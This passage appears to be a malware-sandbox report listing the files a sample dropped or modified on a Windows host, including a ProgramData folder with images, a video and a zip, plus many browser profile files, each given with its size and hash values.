d887b8ae0030ece1ffc938c5cbf92609

SHA1
d5e12bebc86e6294984d592c8b08acc7a719b0fb

SHA256
a7205d4bc615a8fee974d553bf01a6e50bb07974e4b9e5184692932da4e4f473

SHA512
e0f75db5e7a036a39749b9196f82a16017acf85ecf6458e3cbe77e3371901323216f51a31a827a674536f9315ff9d06260695db0752dffbd67245555ee9030e9

Download Submit
C:\ProgramData\slut\files.zip

Filesize
6.4MB

MD5
faeee08963529d39f870e3222b468caf

SHA1
e0c4c59dd9a3d87027ae5251d14ddabdd94b822c

SHA256
5d06c9495bd162670fea2b241971c5994d9f5b66db19f75454ff9ea91bd6b8c2

SHA512
80a54dfd25f9c8caa6db85894df266923bdcd7e662ec9c0533982867ec3a9c5e6da044874478851cd2fb8f938051c2b33b7e932173986555c24bf13bc82d8d69

Download Submit
C:\ProgramData\slut\lockscreen.jpg

Filesize
939KB

MD5
f18483f9af092c34c4aaa879788e9ff5

SHA1
6cacc0d74b14c47c0fc6516527091efb98b3bd1b

SHA256
9ca9de43f58c69224d50db61aa9e5bfe6e069efbfdbd6809f8e7cc4055e39505

SHA512
1064046a1135e3e6ef3131b39581c4374b8f99493d099ee05a66c2f243c85197c98b4d1eac01ba166e4d032723c86a011c9dfefa6acfa0ebf4f943d006e2d294

Download Submit
C:\ProgramData\slut\video.webm

Filesize
1.0MB

MD5
b53fd849b29e73ad566b103ee3986cac

SHA1
dd2565ecd0d99cc736a8de8c1fe0aa28213bf7d8

SHA256
7f3dfe18b36b51ac60adea3be1832f67ab9d3cbc735c55a13a03c12641a3e524

SHA512
db895ad7b11bc1e5e021030d6d9b66aaacf33368c31686fb2e58a5ae34edcf496a0246df49512675e90e687971aab98ecf1143611ac36927e5fbeb478bad35ce

Download Submit
C:\ProgramData\slut\wallpaper.jpg

Filesize
350KB

MD5
ff20cb196cdfeda0620abce308b86a0d

SHA1
00bf6861ff80e24f606de6cd0968351ce15750bf

SHA256
543f624e3c39d4c6b2a2208111adffaaefb9e24ae51effe9621e8878781439e7

SHA512
079f6c94ddcdb958f6be7cf51505faa3fffe7dc1f552c73d9de50ddb412a38bb4801897f8b245ee51382a4c05f5383114d538fe2b46804e9aabed41d074fb3b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
b0366599d64b0fc1adb2a712dcd02ee1

SHA1
b7a1c09ccd2846664cab5f76bd80b8e9f107acb0

SHA256
ae1bddb9e2cc97b0c9cd78ef3cd17553be6e5204677bd67e0b8f7fa27007f189

SHA512
d7de6d48285018f8b709c81ca01688126db7893ce9f48829524ee3122aa6f2200c7f78186b5a558d0b1ecf8157ee78a20064b63b45ab89f7aa0835b8409435d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
1d6d1e773c2cb63516dc875f48b6b40c

SHA1
80bcca5dd15ffceb74ffe8b17a31e5d46da41473

SHA256
2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1

SHA512
becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
bd34916b8f7eb304c0c3f34a49698f9b

SHA1
6a3c886f5d59be4fbcb69bce4b6a554a3e7ecf81

SHA256
3dfc846d080747e977d75a3f3bf14c91e6a4adc1d69a640cd7a54aa190984af1

SHA512
de0a57963d87e90b75fd7993a52ddadc7634c6605b8a9b5725f3f608fc81eda7e31861f3e8aed818e7dd94ef0eddf5ccfee16cbc62697df94872da8e212d38e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000038

Filesize
78KB

MD5
ebf9f356f94eb86255d745d443060223

SHA1
4312caa6808c65151534fc0ffc8f24618a8aaa5c

SHA256
0929ef16341234cc7dc80419f8a9ffdf1eea08be0151b5f961c42a7b346ede6e

SHA512
a8e2db8d6791d7e8df66da3138f7acfc3c2d924eccde2b01146b06cb846fa9f994d7647d7426e8339eab91aa2edb6af7a2bd50c03f1e466738ac082cc8a787f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
744B

MD5
373f53c12270662c2180436a29348053

SHA1
6f9c17b20643f2d91d97fb0333fb4df894189c46

SHA256
19757ceb5526191c057c4cbcb4d9b258df6d349f4aedc1b5ed3df9dff4cb8d4a

SHA512
479b569f005f1952d98fbf32ded7f23912d05686ae2e39e1dc746799be28e18d9913b04a8e05bf8408799238b2497140c43b9b57552a6f48588a8b283963a046

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b73a67278d59284dc79041d3eaff64b1

SHA1
9348244c652906c431bf51d0ecd5f618b88ee1b1

SHA256
3732f658fa97d9ffc6b263802f3d816c336b03ea8f2bc3e102eb2ef40cab6952

SHA512
b548a4c67c2fbc330d090ba40993e177aa6b4b2f0fd391a1de7d717a12fbcbe3d52677699401f715b38b6bc5c094cfa7458382f33762309a655a4aa1e040dd08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
33c57f3380daaa7341ddf00ec172d7d6

SHA1
8dd21769f5de0311e596a40ab46d70f954971acd

SHA256
69d803705ea06221323c2f704bb1f90da3631e145429194c2237dba818fcebd0

SHA512
a6a1e14b73b4aff47fbdcc8eef994baf315524135094d4db94ee62ff8bfb1419156c01a47a826729c73d779f3836294fc5e2d959df7b9883c43f3d2df43763c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
8a0406c0e37a661d237b570e0f83ef6a

SHA1
b516b3005f05e2c2bacc533fe663c0780188b838

SHA256
d8381ccfb6d199029b202a9965d57e9889b7cb21d825635c7f7c4a77c3bc98f5

SHA512
ecd98d6f163dd59a6fcb3dff66e9a3889ad276baf86b8f6b4b81bf66c8d36b3b7380f1f8c7a72e75746e9b8e6c3cf830521db7ec8693420454d8c362c2a47843

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
c46c912b48b9965527b9e62e1e875e4c

SHA1
03ee8d6cda881535a8bce58cb62343c21ecc0195

SHA256
40a956b7e62ce669a77d970846954b8e7bdcfa8a4188e8a820e587fe9478c1a6

SHA512
051cf16f21083db61bba9f45e9873cab266a50fcee8855240da96a5b6a814d6d115f0b5fc2bab722e9be8cb26d95e0d62f602419cf16286fc0421e16ff4b0f83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
2b34a3371906cf2aabe14166b377472c

SHA1
7f0c4218d7944dee01a2e57774b34e69dbe2ce94

SHA256
162fcaba65b8b514727b344277a92de0914c0c951ed3ae68f51e51102627a831

SHA512
169f1fc4fd87cae49a452c946e5ea606c8b02c5ce7014c2584c9b9e5c301917e82a11bd6a0fd3f72124923a64de8ff522796834baf982508a0b788331ee150a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
17263d0be326a0630e22ee3b3afd503d

SHA1
7ffec05bfa666b77b0282bbfdae9f6c83ced339a

SHA256
e26b500eb54e2f146b422327ee1ba729adaf8b952aa86897db8e8eed07884172

SHA512
d8bc8ee88c23ec7ea5771feb5b167c3892a8670ffbc1a655447f78ed3c294a66737093b2e5c601764f68a12caf6491a26bd69a7316362cfe0dbc5bb196db0601

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
a4f7398eb5dc8b85154ce83a229cb11e

SHA1
c8b7e9ec3131557043c199bd7453289d66dfee38

SHA256
43f4d1c1747deffec78dcbecdb874aa37f899c1e3183769c9db386a180a7293a

SHA512
2063af0fad121fabe45387cf03d216151bbb41684b460b7485989ace3668fa75e04be126a6c94a9945661fa053ea216e39e82bc67920c3e60db8bb9985329d34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
820f056d422dcea993f6ec6f0e54d70a

SHA1
a97f1a46a2483b92d4d54047b8a6e2394b3947b8

SHA256
eb8d9f9851b9f9842fb1125af788512cb8a7c4808c603bfd571b9d9cc4af6383

SHA512
31c142502404200eb0b241de2b50efbd14095cbb8be978265b69859a42c1be33b7543161164973d547b6bacfcddd3cfc4eefa2e25cfeadb9115b8952f93ee6aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
422e882eff90726519f3905df68b3350

SHA1
118f1c8bed29b971fbc7c8f557097dda17c2a58d

SHA256
685181ae6ea0c8022daaa0c2823e1c5311e80051c4fa9fe2f4041db7c85e4c27

SHA512
369788693e78272a328c76cb353f405fc897b35b29cac88db2ddb302c18ff18e486ccf63324c28960b06bfafdf81e6725e46a4e4609ea72e14236215f95e9b6c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
18KB

MD5
cf01c0d1b79df2ddb50bf9013588b5f4

SHA1
6ea1d18636f44da8acf964972257bcab9756dbfe

SHA256
428e821b4bd0c220616faa2a37f950b05c453b1286746dd9072c33a710db78bf

SHA512
9a214ac6ab45a029cb5d85061063ebb663633b667dc88fe58a641ab2ac1b4f85fe00e34792d15c0104ba067def8e3a11badcf18b6f31ba8110013c07c07d971e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
72e2b50a656bb0542d8b5140e2ac0683

SHA1
325803da3e2bccfa0a106bd4687da8fc51ab591c

SHA256
75c8503bf058cff565d44c68249abe1f1a1bd197dd7063c199b9ca4485059f8e

SHA512
735d12bf74d92d1e2d2814fea2e6d2db20e311726e3a98a05b7fe8ae3d76acc88a3fb61e0d6fc25696edb1c10cf7f80a32fffce086a058e79988c3ebfdb80792

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
3158b4b5a1eb1e9dbce65ea680e0af91

SHA1
d0a454e2459b0719d64ef00c1e17ca1c7c0c3674

SHA256
64eaf7bcf8cfb6ded75f8168b04e958608c44f96f9f16cb8aa8769d1d070e908

SHA512
ef2e0111c240b6b425f96cc18bec96be842aec1f28d1d92742b2c203661f49b848bbcdadae1753c3c3bbd5e7c866c6beb75c25c123190b7b55cbc9830ad4625d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
bfe054f7d670d57cf01aa02e4165e070

SHA1
99ceed6f96a52b958b07b96622e3879cff2c05c1

SHA256
1373e741db7c16ee131a71ce97d15695a1b5975ced65d275a3cdf87c4a2b68d1

SHA512
64dcaafb21d5b7c63b58f23f983a734e916e31e1296306794dab0872181a801cdccf3486fa48cceb48ec1875213c0b6232f1441d07fb3e26aed28d7d97391af4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58be69.TMP

Filesize
48B

MD5
35315c1c96df5e6e301cf482fe91fa7d

SHA1
7224480e8db5ceb66715c8fc42279e731774f9e0

SHA256
234321949175927e46f115ff3701f46ebf689964874194fb53e51b8c29146696

SHA512
7b74089e200bdfcb506d334253aec509f3b51d29e8b9ec26d480b1725d2dbcda0daf4cbc5213715e96648f816a03fe86cb8405129c5e84cc6d2a3d931e7fb9b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
155KB

MD5
8d1a58b2837bfd95697d5a5c15a5d05f

SHA1
c9ad2910e450da389307276bd439597a229b5211

SHA256
5bf1125dd8145c7e7a39df236dee0026f8282065656b14c438ff0f7c94356d3e

SHA512
66cb82507a51c60c2707da4065d660b03c219e233a64255fb1f2c05cef89504ef5876fc479f01479627e898bd4fb082dd3bda128fe448df456d89e172d612ec8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
155KB

MD5
e2223397dbf56c80ee9a57dc520028ab

SHA1
fcae4e1bd147e6cdc30723ca8446de51100ef56f

SHA256
d61d84c9c3794f0507b28d9f6c01f5b92dd45343f7fe57de1fec88d421c507a0

SHA512
a7b64be9b8aa40db04c33ad102617e52f3cf94a576918d4c5e90d016dbccb20035ea06e912fbb7af7869c03019cad3f50fab371f9bb5f81c30c371866da57502

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
d7efaca70614869e0c92aeeae7e1fbb2

SHA1
ccff0464249f2253390f13510f6376554e8d5c61

SHA256
0af274cc862dc1dca3a9dc70659da916b240dfc09154b2d7102cc1d96e82b627

SHA512
9f1e179712d1b456eb30f136e38261fb50453930233157317d64def03fe4f174a0babe04be64a9268b6ee71e5c4c70cb9b23cbb82e81f17a4aa5a046720900bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
7045652fd01aa2e2941f8ca7da4ceb6a

SHA1
ca8944445ae8309d02e3842b1ba9a953f5673eee

SHA256
47009f2ec5c7c09e42247fbf60837839873d0d5aabe811eee77dcdba77f14ba2

SHA512
aa8310d65a3ef52a90fbb5bbf34d803e2f828a9261c99b6997c304435ef0e39cd7c646b2b5dfbc862a85160ce842264aea1940bb65f68f221598143168a665b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
8c0969701ee5e6ea952a9bf6a875990d

SHA1
a72673b51c53a471b9043590523a578be5739286

SHA256
38db4a75ddb7a7dd83dbedc0704b3586197b698314baf070dd2004b91dabbfa5

SHA512
c5bf08aa8860b96c022267a972354564c640788f9c327ed14296637e9bc469aa53c99d3e987fcca939728a3be70cc335f1da418164be543cc375551dfdcd38d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
1700927fc9307747b6f4e3a85cce3706

SHA1
567fb1530e8393bb41b5464d19010cbc32408d44

SHA256
30be93efca80985543da2bd14f7746151b900e63a1cb33050c67513664abca90

SHA512
c8b208ee5f26f3e0673c332d4e667c715ecfc939f0378d5f62844c027c817544b12f43403dffcb2afa3cb99c7da44d834a94a364deadfdf795978b3e673b21f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
050ccf8b1c0047efe911b34b80c2ca2e

SHA1
21309bb42121fa46c903e6f28e5501c1e397bccd

SHA256
fa834c7d0f1442fc29c50043552458afb7d0fb6ba533bf32c6cfa20793b0d866

SHA512
4b357c26d05f2eb0acc45046c141b6e1c6f0411cae58931b9a7676d34dd7765ef4dc18938de7fd762d897117b63eeb16bbc0f7f0fb1588900757cb07e6f4dd5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
20b5478277b81324f99c22cf03763ee1

SHA1
89db22a4d13c66d7cbfcf00002477d87e98c7dd7

SHA256
5b7f6caaf319d679944c5c668cdaaca62413858cf55950ff2ff07ea9fb965ddd

SHA512
b6929c7ac276a7e97f01d7e342b40c29cbe946cc2edfa9ad8368d174a6d10adefeb64cd3daa78ce1baee7d8bf4204327bcc420a7d87da8724079bfc4f54eb674

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
cbc9fc2d9ad2df85283109b48c8e6db0

SHA1
721ea0dfafd882d6354f8b0a35560425a60a8819

SHA256
7c21b286b304b2b42ab3502158aef04892b60c63007b8ed7172dad86a4bcebbe

SHA512
09594b5f33704cf367960376e5abc8cbfa7baead59c3f199ffd365a9a9c2159b45f6596d597ebdd033db5436c000faac3c5b2fb39e97fc17b102d03831265609

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
046b1cdbd636e82e7711ea1fde31d7e3

SHA1
f5fa4183cb259a99b4148ee957a5f76e80a77ada

SHA256
40328502d95af4c1db45d98abe8c4e9214d80a8df7f0b8f19f81edd5e121f90a

SHA512
460ba5792f0df64289ff4057d04615973a7844b2fd2c14df554600c141d720fcf13d9e9c8449ac57e50fa074a81887437918970881b4d48f7a7ee3521bac8eb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
9KB

MD5
b66d3a2c0e4f0812d21d0666b045822e

SHA1
587c36ca0914f35e502a591c66d2b7367b5c70dc

SHA256
d31ea473c646e85ce339ce02fc3149befa82b4142d82064524de871dbb6715a2

SHA512
aaf97e04ff0e18555440255725d7235ad5ebe44e58e79957ec96193e6c194bf8488146037cdaa62909cdb519f20d344c5d7f12486e9482f7a5a76ea638a3e912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe581ac6.TMP

Filesize
4KB

MD5
6af9fbd51144d27a89f143924e455780

SHA1
a371bdc12c7eea53760feabd0bd35df987ac7b4f

SHA256
9fb19b8f4a6dfcd07e8700409563f22cc360a18f7e0f173a8f6bc7db40af22a7

SHA512
44befdc8752776804b93b36a7d8bd7b84e78a444b3284d5c86b23e0c2847d9824dbcbb96f57944625c761179c742c84cc045d7edd3e63c00bc79361af23226da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

Filesize
9KB

MD5
3d20584f7f6c8eac79e17cca4207fb79

SHA1
3c16dcc27ae52431c8cdd92fbaab0341524d3092

SHA256
0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

SHA512
315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\36deb52f-031b-4b3e-a195-2aef08e2747c.tmp

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
6cbe375d0b1ab9472d052ef909d113b2

SHA1
a91f31fb9586e3fc13291b47fc21f47337818897

SHA256
5e74dd260e11290858c13d94d17b499bb5e3833ef9e747521e79922873927242

SHA512
e16657012743a579967349bacd1475187fbd7876257267e8d6d507c133305a86d91765484918cb7db3fe0b390e186c692226a04eb0c076fff2c44f4c39040ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
bb34973eaba121d3623e3d55c31480af

SHA1
ede4bb2478f95378724a685cb8b269d883c6c3e1

SHA256
ead475c3b98efbd59cb5f7c2d5ac12c87f5482a41cf98770ab4e01055ea44932

SHA512
3cf859038f7aaccb5b17b9c232d48041a8c65d8278f718b8828420678887615ba5bb146411b1a968062854d555ee08624150cb78d4711dd2ec539c909f47ac82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
ff756c4f8df1e6c05154088aed76c0f4

SHA1
47d61ad0731f91d01f28e642adb5479d5662487b

SHA256
54dd3ef9fbd69beb839a03eabd472463a1b4a3708cbab25ace2859696e093d32

SHA512
674730918aef4616dd27414f5b957e4542ae349f68869c7b05dbbe923b661b11f4c789563bd91f0edfb85ec46ef814a0e4b5fe8482570bfd785ef597b365f49d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
f977aa942239139d8d07587f0696c4c7

SHA1
fac1e01e503073f4ae0d7399e0b0255d66bfa702

SHA256
afcd83d8bdc75617f253861d22658e2d3d8a91b0bd98c8f8127153e51bf49ebc

SHA512
9ebcafbe7a754817b242cd5348a29b97eebb9500e82014a690b1f69f720427a1ed8b5cb15fd834015af954c3abdc13d3d6ea5ce9b127bd0c70cd8c8015a06c20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
14KB

MD5
81fef6188e1ac900c47b6d530818ea03

SHA1
0dee0c8316b2b7c2c96e7b0cc238b312188ecc34

SHA256
bba5c38bf1a44230e928990caa50eceb0eaec0473db22df3a7c16bc8f8944cae

SHA512
d97a0cdbf084228825420473563e0fb3b4dca79cfdb4390e8c946dc30803a47067a98df837d5367bc7fcdf4d65c67068893065d7abb280188077644741779045

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
38332d20fadd9c5c03dd0f23f2cfd7ce

SHA1
3b166c8934acae35a121548e16f850bd00d3cc7d

SHA256
f1aff026959d8193b072f91718df32eac14cd3ed92785bc9777436ed208b7f9d

SHA512
7fa3db134f88fa45422763b519724eb371617fa2340bdd70df82ea4b7fdbe3d9fad98f8997db009d1ed922385d0f529eee054ba5573d5f13bcb7d16079d94239

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
34KB

MD5
5d32da1b030d000f8d4fdef7ea3ca245

SHA1
84d06d673359ec3097326b5d4f4537c3641acfad

SHA256
97be81e9483db861277a35b6876b99a35525dd8442fa5f2c6b21430afbf07a6d

SHA512
31a35572daea1cc7fb279ea8f2c5b23ddcb539c87981f14ce6be9c339fa6f17bcd8310704d0dc2d374feae5bbfb1132c820d52ad448fb4b2a4680da1662b9e5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
48B

MD5
004c8c8a663d685d86de81e21a4cf620

SHA1
e839ad6da4d7c62a83809398bd97bf0a7a59f8c7

SHA256
296aa1bfc70da5a3116c879150fff8bca35c1292fb75ba3bb4d3a3ffff6508de

SHA512
8719b800100428fdd9df152ace3839e61acc6ee5280b56eee42c58c03d9c74ce1d7d4fda298b433f6a8e66ae22f25fd25bb172301fc3983ce04bb8db7637be0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe581aa7.TMP

Filesize
48B

MD5
fbeba2fc5c06126c0e18e00dee144360

SHA1
182a2c807018ad4eeea6b371e5d8d3a4b4480f30

SHA256
bcee7d5028d10d4416be0d262708f711ea457ae066c56df0196afae7e3124094

SHA512
e46328c0d410cee21f0322b089c8b0a0aec42b8597baefc9dde65096a105734a94e3f9a446bfa115878e392b0bbbca098f7c681f28ce7a05ba8729fdb08c83d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
4KB

MD5
c6499a595d3abe6b2e6b91f6f88b532b

SHA1
54e3ab9fe728564bf44bbeff1fbbda0dc15ddef2

SHA256
85c3d03ee69f79c993fe8588e798f076e8a79dd0091de06e7c61d64fadfa3226

SHA512
d75dcce3d82f6b7b7740175c287d8167793906e8f2294174243a8afab73538fc3c3e11ae6b46d7120410961963e6c813121a37f312bf244797ec7fc9af010f44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
6KB

MD5
c4724fb9d78599d00e7dd34e7540e517

SHA1
181fa4e757e5ceaee005c2e69e8d4bb6a30f71f4

SHA256
13208d66cfe6482465a665255430c26b42f7f546cb4da8975aa39ab75a6517e9

SHA512
7b1ea70507dd465dae66b71cf4669f01ac6aaa3e0fb4547c57f83e5392156bc98a1fa955e88efd88e96de7ddb4c431aca23232fe4a8e89b5a70dc5325c6ebda7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4b99a58ea985fe204bcc5b55a61d22ce

SHA1
87c4a354dfa3fcc9b130e18db7a3624405859632

SHA256
104d238e9a4764eb704f649268d2152dcfa7c5ec269e5ab05142eaabe17782cb

SHA512
de7169c6b2c2cae4c81d899fc6821b8911037e9203b20145e5a9db782db5bb0924b90e43aebda5cfe201c689d2260c88eef7fa0ffe7f559c1c84a94f92c7d925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
03f939ffd3d8be1c888afd6fe3a06e95

SHA1
56cf0d39ebbe63c7f148d6e375e9b7408c6b9a93

SHA256
bfa4ea0c63e1aba9876a2ee4cdab2c6f569018f3769b683d55dc0ad237c8341f

SHA512
eb679330bc7b4328fc3e1f39af3329bc7a078d62bd18f8fc477a248a87b898fbcde48eae262609074a64732d30d831cd94f3760f8f0be6a85965fcb69d806cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
e0a45219a7ca99278bd9e9de85bf0ebb

SHA1
c3f723a602541d757b00bda9f824a76259933ec4

SHA256
